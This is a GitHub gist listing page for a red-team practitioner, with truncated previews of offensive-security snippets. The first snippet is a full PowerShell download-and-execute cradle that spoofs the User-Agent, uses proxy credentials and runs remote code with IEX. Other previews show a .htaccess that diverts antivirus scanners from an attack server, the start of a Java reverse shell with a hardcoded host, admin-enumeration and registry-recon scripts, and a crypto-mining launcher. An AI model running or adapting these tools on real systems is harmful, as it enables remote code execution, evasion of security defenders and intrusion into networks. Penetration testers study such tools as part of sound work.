Skip to content

Instantly share code, notes, and snippets.

Avatar

Steve Borosh rvrsh3ll

View GitHub Profile
View proxybypass.txt
powershell.exe -nop -c "`$wc = New-Object System.Net.Webclient; `$wc.Headers.Add('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) Like Gecko'); `$wc.proxy= [System.Net.WebRequest]::DefaultWebProxy; `$wc.proxy.credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials; IEX (`$wc.downloadstring('$URL'))"
View Get-RecentDocs.ps1
function Get-RecentDocs {
<#
.SYNOPSIS
Pulls names of recently opened documents from registry
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION
View cpl.cs
using System;
using System.Runtime.InteropServices;
using RGiesecke.DllExport;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Text;
public class Test
{
@rvrsh3ll
rvrsh3ll / lookupadmins.py
Created Sep 3, 2017 — forked from ropnop/lookupadmins.py
Python script using Impacket to enumerate local administrators over SAMR
View lookupadmins.py
#!/usr/bin/env python
#
# Title: lookupadmins.py
# Author: @ropnop
# Description: Python script using Impacket to query members of the builtin Administrators group through SAMR
# Similar in function to Get-NetLocalGroup from Powerview
# Won't work against Windows 10 Anniversary Edition unless you already have local admin
# See: http://www.securityweek.com/microsoft-experts-launch-anti-recon-tool-windows-10-server-2016
#
# Heavily based on original Impacket example scripts written by @agsolino and available here: https://github.com/CoreSecurity/impacket
View Mine-MostProfitableGeneric.ps1
function Mine-MostProfitableCoin {
# Modify to your appropriate miner's locations
$ElectroneumMiner = "C:\Users\rvrsh3ll\Desktop\mining\Active_Miners\ccminer-x64-2.2.2-cuda9\ccminer-x64.exe"
$MoneroMiner = "C:\Users\rvrsh3ll\Desktop\mining\Active_Miners\ccminer-x64-2.2.2-cuda9\ccminer-x64.exe"
$BitCoinGoldMiner = "C:\Users\rvrsh3ll\Desktop\mining\Active_Miners\ccminer-x64-2.2.2-cuda9\ccminer-x64.exe"
$MonaCoin = "C:\Users\rvrsh3ll\Desktop\mining\Active_Miners\xmr-stak-monero\xmr-stak.exe"
# Modify to your public wallet's addresse's
@rvrsh3ll
rvrsh3ll / .htaccess
Created Apr 23, 2018 — forked from curi0usJack/.htaccess
Drop into your apache working directory to instantly redirect most AV crap elsewhere.
View .htaccess
RewriteEngine On
# Uncomment the below line for verbose logging, including seeing which rule matched.
#LogLevel alert rewrite:trace5
# BURN AV BURN
# AWS Exclusions. Cloudfronted requests by default will have a UA of "Amazon Cloudfront". More info here: https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/header-caching.html#header-caching-web-device
RewriteCond expr "-R '54.0.0.0/8'" [OR]
RewriteCond expr "-R '52.0.0.0/8'" [OR]
@rvrsh3ll
rvrsh3ll / converter.sh
Created May 27, 2018 — forked from xdavidhu/converter.sh
Converter.sh, a bash script to convert domain lists to resolved IP lists without duplicates
View converter.sh
# Converter.sh by @xdavidhu
# This is a script inspired by the Bug Hunter's Methodology 3 by @Jhaddix
# With this script, you can convert domain lists to resolved IP lists without duplicates.
# Usage: ./converter.sh [domain-list-file] [output-file]
echo -e "[+] Converter.sh by @xdavidhu\n"
if [ -z "$1" ] || [ -z "$2" ]; then
echo "[!] Usage: ./converter.sh [domain-list-file] [output-file]"
exit 1
fi
@rvrsh3ll
rvrsh3ll / C.java
Created Jun 13, 2018 — forked from caseydunham/C.java
Java Reverse Shell
View C.java
// Not sure where I originally got this from.
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
public class C {
public C() throws Exception {
String host="10.0.0.90";
View ExampleActivator.java
package com.rvrsh3ll.osgi.shellme;
import org.osgi.framework.BundleActivator;
import org.osgi.framework.BundleContext;
public class Activator implements BundleActivator {
public void start(BundleContext context) throws Exception {
System.out.println("Hi!");
}
public void stop(BundleContext context) throws Exception {
System.out.println("RIP");
}
View CompileBundle.txt
javac -d ../classes/ -cp ../lib/felix.jar com/rvrsh3ll/osgi/shellme/Activator.java
jar -cmf MANIFEST.MF rvrsh3ll.jar -C ../classes com